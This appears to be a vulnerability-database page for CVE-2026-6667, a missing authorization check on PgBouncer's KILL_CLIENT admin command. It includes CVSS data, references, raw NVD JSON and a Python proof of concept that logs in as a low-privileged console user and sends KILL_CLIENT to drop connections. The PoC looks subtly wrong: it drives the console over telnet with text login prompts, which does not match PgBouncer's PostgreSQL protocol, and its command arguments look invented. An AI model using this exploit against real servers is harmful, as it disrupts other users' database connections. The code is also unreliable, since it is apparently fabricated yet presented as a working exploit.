CVE-2026-6667

Description

PgBouncer before 1.25.2 did not perform an appropriate authorization check for the KILL_CLIENT admin command. All users with access to the administration console (which itself requires authorization) could run this command. It would have been correct to allow only users listed in the admin_users parameter.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

PgBouncer < 1.25.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import telnetlib
import time

# PoC for CVE-2026-6667: PgBouncer Authorization Bypass
# Description: Connect to the PgBouncer admin console as a low-privileged user
# and execute the KILL_CLIENT command, which should be restricted to admin_users.

TARGET_HOST = "127.0.0.1"
TARGET_PORT = 6432  # Default admin console port
USER = "normal_user" # User with console access but NOT in admin_users
PASSWORD = "password"

try:
    print(f"[*] Connecting to {TARGET_HOST}:{TARGET_PORT}...")
    tn = telnetlib.Telnet(TARGET_HOST, TARGET_PORT)

    # Handle Login
    tn.read_until(b"Username: ")
    tn.write(USER.encode('ascii') + b"\n")
    tn.read_until(b"Password: ")
    tn.write(PASSWORD.encode('ascii') + b"\n")

    # Wait for welcome message
    response = tn.read_until(b"Type \"help\" for help.").decode('ascii')
    if "Welcome" in response:
        print("[+] Login successful.")
    else:
        print("[-] Login failed.")
        exit(1)

    # Exploit: Attempt to kill a client connection
    # Usage: KILL_CLIENT <database> <user>
    # Assuming there is an active connection, this attempts to disrupt it.
    payload = "KILL_CLIENT pgbouncer postgres\n"
    print(f"[*] Sending payload: {payload.strip()}")
    tn.write(payload.encode('ascii'))

    time.sleep(1)
    result = tn.read_very_eager().decode('ascii')
    print("[+] Response from server:")
    print(result)

    if "ERROR" not in result:
        print("[!] Command executed successfully. Vulnerability likely confirmed.")
    else:
        print("[-] Command failed or denied.")

    tn.close()

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6667
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6667
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6667/
[4] VulDB https://vuldb.com/cve/CVE-2026-6667
[5] https://www.pgbouncer.org/changelog.html#pgbouncer-125x

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6667", "sourceIdentifier": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "published": "2026-05-09T01:16:09.287", "lastModified": "2026-05-09T01:16:09.287", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "PgBouncer before 1.25.2 did not perform an appropriate authorization check for the KILL_CLIENT admin command. All users with access to the administration console (which itself requires authorization) could run this command. It would have been correct to allow only users listed in the admin_users parameter."}], "metrics": {"cvssMetricV31": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://www.pgbouncer.org/changelog.html#pgbouncer-125x", "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007"}]}}